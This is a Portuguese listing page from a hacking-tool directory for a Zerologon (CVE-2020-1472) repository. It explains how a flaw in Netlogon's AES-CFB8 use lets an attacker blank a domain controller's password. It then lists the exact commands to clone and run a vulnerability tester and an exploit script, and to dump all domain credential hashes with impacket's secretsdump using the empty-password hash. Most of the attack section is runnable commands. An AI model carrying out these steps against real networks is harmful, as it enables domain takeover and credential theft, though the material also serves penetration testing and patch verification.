Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-1472 — [CVE-2020-1472] Chamada de Protocolo Remoto Netlogon (MS-NRPC) Escalação de Privilégios (Zerologon) | Kitploit
Ferramentas/GitHubGitHub/murataydemir/cve-2020-1472
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAutenticaçãoRed Teaming
GitHubmurataydemir/cve-2020-1472

CVE-2020-1472

[CVE-2020-1472] Chamada de Protocolo Remoto Netlogon (MS-NRPC) Escalação de Privilégios (Zerologon)

Ver Repositório
123há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

[CVE-2020-1472] Escalação de Privilégio na Chamada de Protocolo Remoto Netlogon (MS-NRPC) (Zerologon)

O ataque descrito aqui aproveita falhas em um protocolo de autenticação criptográfica (uso inseguro de AES-CFB8) que comprova a autenticidade e a identidade de um computador associado ao domínio perante o Domain Controller (DC). Devido ao uso incorreto de um modo de operação AES, é possível falsificar a identidade de qualquer conta de computador (incluindo a do próprio DC) e definir uma senha vazia (simplesmente enviando uma série de mensagens Netlogon nas quais vários campos são preenchidos com zeros) para essa conta no domínio. Isso pode então ser usado para obter credenciais de administrador do domínio e, em seguida, restaurar a senha original do DC.

Para verificar o CVE-2020-1472

  • git clone https://github.com/SecuraBV/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • pip install -r requirements.txt
  • python zerologon_tester.py EXAMPLE-DC 1.2.3.4 (exemplo: ./zerologon_tester.py DC01 172.16.208.161)

Para explorar o CVE-2020-1472

  • git clone https://github.com/dirkjanm/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • python cve-2020-1472-exploit.py EXAMPLE-DC 1.2.3.4 (exemplo: ./cve-2020-1472-exploit.py DC01 172.16.208.161)
  • git clone https://github.com/SecureAuthCorp/impacket.git
  • cd impacket
  • pip install .
  • python setup.py install
  • cd examples

Em seguida, execute um dos seguintes comandos

Exemplo de formato 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Exemplo de formato 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

Imagem do PoC

A postagem original do blog está disponível aqui
O repositório original que inclui o script de teste em Python está disponível aqui
O repositório original que inclui o script de exploit em Python está disponível aqui

Baixar ferramenta